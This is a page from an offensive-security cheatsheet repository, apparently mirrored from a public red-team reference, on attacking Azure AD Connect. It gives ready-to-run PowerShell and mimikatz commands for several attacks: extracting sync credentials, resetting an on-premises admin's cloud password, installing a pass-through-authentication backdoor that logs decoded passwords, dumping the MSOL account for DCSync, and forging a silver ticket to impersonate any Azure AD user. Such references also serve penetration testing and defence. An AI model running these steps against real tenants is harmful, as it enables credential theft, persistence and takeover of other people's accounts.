daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

azure-ad-connect.md (7881B)


      1 ---
      2 title: "Azure AD - AD Connect and Cloud Sync"
      3 section: "Cloud"
      4 sectionSlug: "cloud"
      5 sourcePath: "docs/cloud/azure/azure-ad-connect.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/azure/azure-ad-connect.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Azure AD - AD Connect and Cloud Sync
     12 
     13 | Active Directory                  | Azure AD          |
     14 |-----------------------------------|-------------------|
     15 | LDAP                              | REST API'S        |
     16 | NTLM/Kerberos                     | OAuth/SAML/OpenID |
     17 | Structured directory (OU tree)    | Flat structure    |
     18 | GPO                               | No GPO's          |
     19 | Super fine-tuned access controls  | Predefined roles  |
     20 | Domain/forest                     | Tenant            |
     21 | Trusts                            | Guests            |
     22 
     23 Check if Azure AD Connect is installed : `Get-ADSyncConnector`
     24 
     25 * For **PHS**, we can extract the credentials
     26     * Passwords from on-premise AD are sent to the cloud
     27     * Use replication via a service account created by AD Connect
     28 * For **PTA**, we can attack the agent
     29     * Possible to perform DLL injection into the PTA agent and intercept authentication requests: credentials in clear-text
     30 * For **Federation**, connect Windows Server AD to Azure AD using Federation Server (ADFS)
     31     * Dir-Sync : Handled by on-premise Windows Server AD, sync username/password
     32     * extract the certificate from ADFS server using DA
     33 
     34 ## Password Hash Synchronization
     35 
     36 Get token for `SYNC_*` account and reset on-prem admin password
     37 
     38 ```powershell
     39 PS > Import-Module C:\Users\Administrator\Documents\AADInternals\AADInternals.psd1
     40 PS > Get-AADIntSyncCredentials
     41 
     42 PS > $passwd = ConvertToSecureString 'password' -AsPlainText -Force
     43 PS > $creds = New-Object System.Management.Automation.PSCredential ("<Username>@<TenantName>.onmicrosoft.com", $passwd)
     44 PS > GetAADIntAccessTokenForAADGraph -Credentials $creds –SaveToCache
     45 
     46 PS > Get-AADIntUser -UserPrincipalName onpremadmin@defcorpsecure.onmicrosoft.com | select ImmutableId
     47 PS > Set-AADIntUserPassword -SourceAnchor "<IMMUTABLE-ID>" -Password "Password" -Verbose
     48 ```
     49 
     50 ## Pass-Through Authentication
     51 
     52 1. Check if PTA is installed : `Get-Command -Module PassthroughAuthPSModule`
     53 2. Install a PTA Backdoor
     54 
     55     ```powershell
     56     PS AADInternals> Install-AADIntPTASpy
     57     PS AADInternals> Get-AADIntPTASpyLog -DecodePasswords
     58     ```
     59 
     60 ## Federation
     61 
     62 * [Golden SAML](/internal/active-directory/ad-adfs-federation-services)
     63 
     64 ## AD Connect - Credentials
     65 
     66 * [dirkjanm/adconnectdump](https://github.com/dirkjanm/adconnectdump) - Dump Azure AD Connect credentials for Azure AD and Active Directory
     67 
     68 | Tool          | Requires code execution on target | DLL dependencies | Requires MSSQL locally | Requires python locally |
     69 | ------------- | --------------------------------- | ---------------- | ---------------------- | ----------------------- |
     70 | ADSyncDecrypt | Yes                               | Yes              | No                     | No                      |
     71 | ADSyncGather  | Yes                               | No               | No                     | Yes                     |
     72 | ADSyncQuery   | No (network RPC calls only)       | No               | Yes                    | Yes                     |
     73 
     74 * **ADSyncDecrypt**: Decrypts the credentials fully on the target host. Requires the AD Connect DLLs to be in the PATH. A similar version in PowerShell was released by Adam Chester on his blog.
     75 * **ADSyncGather**: Queries the credentials and the encryption keys on the target host, decryption is done locally (python). No DLL dependencies.
     76 * **ADSyncQuery**: Queries the credentials from the database that is saved locally. Requires MSSQL LocalDB to be installed. No DLL dependencies. Is called from adconnectdump.py, dumps data without executing anything on the Azure AD connect host.
     77 
     78 Credentials in ADSync : `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf`
     79 
     80 ## AD Connect - DCSync with MSOL Account
     81 
     82 You can perform **DCSync** attack using the MSOL account.
     83 
     84 Requirements:
     85 
     86 * Compromise a server with Azure AD Connect service
     87 * Access to ADSyncAdmins or local Administrators groups
     88 
     89 Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted password for the MSOL account:
     90 
     91 * [xpn/azuread_decrypt_msol.ps1](https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545): AD Connect Sync Credential Extract POC
     92 * [xpn/azuread_decrypt_msol_v2.ps1](https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c): Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
     93 
     94 Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack.
     95 
     96 ## AD Connect - Seamless Single Sign On Silver Ticket
     97 
     98 Anyone who can edit properties of the `AZUREADSSOACCS$` account can impersonate any user in Azure AD using Kerberos (if no MFA)
     99 
    100 Seamless SSO is supported by both PHS and PTA. If seamless SSO is enabled, a computer account **AZUREADSSOC** is created in the on-prem AD.
    101 
    102 :warning: The password of the AZUREADSSOACC account never changes.
    103 
    104 Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsoftazuread-sso.com/) to convert Kerberos tickets to SAML and JWT for Office 365 & Azure
    105 
    106 1. NTLM password hash of the AZUREADSSOACC account, e.g. `f9969e088b2c13d93833d0ce436c76dd`.
    107 
    108     ```powershell
    109     mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit
    110     ```
    111 
    112 2. AAD logon name of the user we want to impersonate, e.g. `elrond@contoso.com`. This is typically either his userPrincipalName or mail attribute from the on-prem AD.
    113 3. SID of the user we want to impersonate, e.g. `S-1-5-21-2121516926-2695913149-3163778339-1234`.
    114 4. Create the Silver Ticket and inject it into Kerberos cache:
    115 
    116     ```powershell
    117     mimikatz.exe "kerberos::golden /user:elrond
    118     /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234
    119     /domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd
    120     /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit
    121     ```
    122 
    123 5. Launch Mozilla Firefox
    124 6. Go to about:config and set the `network.negotiate-auth.trusted-uris preference` to value `https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com`
    125 7. Navigate to any web application that is integrated with our AAD domain. Fill in the user name, while leaving the password field empty.
    126 
    127 ## References
    128 
    129 * [Azure AD connect for RedTeam - Adam Chester @xpnsec - February 18, 2019](https://blog.xpnsec.com/azuread-connect-for-redteam/)
    130 * [Azure AD Kerberos Tickets: Pivoting to the Cloud - Edwin David - February 9, 2023](https://trustedsec.com/blog/azure-ad-kerberos-tickets-pivoting-to-the-cloud)
    131 * [Azure AD Overview - John Savill's Technical Training - Oct 7, 2014](https://www.youtube.com/watch?v=l_pnNpdxj20)
    132 * [DUMPING NTHASHES FROM MICROSOFT ENTRA ID - Secureworks](https://www.secureworks.com/research/dumping-nthashes-from-microsoft-entra-id)
    133 * [Impersonating Office 365 Users With Mimikatz - Michael Grafnetter - January 15, 2017](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
    134 * [Introduction to Microsoft Entra Connect V2 - Microsoft](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-azure-ad-connect-v2)
    135 * [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory - Dirk-jan Mollema - 1st apr. 2019](https://www.youtube.com/watch?v=JEIR5oGCwdg)
    136 * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
    137 * [Update: Dumping Entra Connect Sync Credentials - @hotnops - June 10, 2025](https://posts.specterops.io/update-dumping-entra-connect-sync-credentials-4a9114734f71)
    138 * [Windows Azure Active Directory in plain English - Openness AtCEE - January 9, 2014](https://www.youtube.com/watch?v=IcSATObaQZE)